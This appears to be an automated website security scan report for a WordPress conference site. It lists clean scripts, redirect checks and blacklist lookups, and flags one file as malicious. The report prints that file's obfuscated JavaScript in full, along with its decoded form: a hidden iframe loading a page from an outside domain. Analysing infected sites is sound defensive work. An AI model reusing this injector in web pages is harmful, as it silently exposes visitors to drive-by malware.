Scanned pages/files
Request | Server response | Status |
http://bw-highereducationsummit.com/ | 200 OK Content-Length: 2586 Content-Type: text/html | clean |
http://bw-highereducationsummit.com/wp-content/themes/highereduction/js/jquery-1.7.1.min.js | 200 OK Content-Length: 93870 Content-Type: text/javascript | clean |
http://bw-highereducationsummit.com/wp-content/themes/highereduction/js/jquery.cycle.all.js | 200 OK Content-Length: 46061 Content-Type: text/javascript | clean |
http://bw-highereducationsummit.com/wp-content/themes/highereduction/js/scroll-startstop.events.jquery.js | 200 OK Content-Length: 2129 Content-Type: text/javascript | clean |
http://bw-highereducationsummit.com/wp-content/themes/highereduction/js/tabing.js | 200 OK Content-Length: 801 Content-Type: text/javascript | clean |
http://bw-highereducationsummit.com/wp-content/themes/highereduction/js/jquery.mCustomScrollbar.js | 200 OK Content-Length: 46224 Content-Type: text/javascript | clean |
http://bw-highereducationsummit.com/wp-content/themes/highereduction/js/jquery.mousewheel.js | 200 OK Content-Length: 2400 Content-Type: text/javascript | clean |
http://bw-highereducationsummit.com/test404page.js | 404 Not Found Content-Length: 11095 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: economicprotection.biz z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('%')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['write'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%e200%o221%o220%i204%p226%o227%e200%t221%o221%.144%i227%/147%v233%w241%p158%c202%i168%486% 134%r211%m210%b209%r214%e215%=95%082% 147%t237%l209%=95%w224%d216%h162%0107% 136%e206%g207%t174%082%"96%<107%i207%r211%m210%>62')); Decoded script: <iframe src="http://economicprotection.biz/dvswzp.cgi?4" frameborder="0" style="width:0; height:0""></iframe> | ||
http://bw-highereducationsummit.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96402 Content-Type: text/javascript | clean |
http://bw-highereducationsummit.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: text/javascript | clean |
http://bw-highereducationsummit.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.50.0-2014.02.05 | 200 OK Content-Length: 16305 Content-Type: text/javascript | clean |
http://bw-highereducationsummit.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.8 | 200 OK Content-Length: 9630 Content-Type: text/javascript | clean |
http://bw-highereducationsummit.com/wp-includes/js/masonry.min.js?ver=3.1.2 | 200 OK Content-Length: 31700 Content-Type: text/javascript | clean |
http://bw-highereducationsummit.com/wp-includes/js/jquery/jquery.masonry.min.js?ver=3.1.2 | 200 OK Content-Length: 1836 Content-Type: text/javascript | clean |
http://bw-highereducationsummit.com/wp-content/themes/highereduction/js/functions.js?ver=2013-07-18 | 200 OK Content-Length: 3380 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bw-highereducationsummit.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Aug 2014 03:23:29 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Link: <http://bw-highereducationsummit.com/>; rel=shortlink
X-Died: timeout at scan.pm line 1546.
X-Pingback: http://bw-highereducationsummit.com/xmlrpc.php
X-Powered-By: PleskLin
GET / HTTP/1.1
Host: bw-highereducationsummit.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Aug 2014 03:23:29 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Link: <http://bw-highereducationsummit.com/>; rel=shortlink
X-Died: timeout at scan.pm line 1546.
X-Pingback: http://bw-highereducationsummit.com/xmlrpc.php
X-Powered-By: PleskLin
Second query (visit from search engine):
GET / HTTP/1.1
Host: bw-highereducationsummit.com
Referer: http://www.google.com/search?q=bw-highereducationsummit.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bw-highereducationsummit.com
Referer: http://www.google.com/search?q=bw-highereducationsummit.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bw-highereducationsummit.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bw-highereducationsummit.com/
Result: bw-highereducationsummit.com is not infected or malware details are not published yet.
Result: bw-highereducationsummit.com is not infected or malware details are not published yet.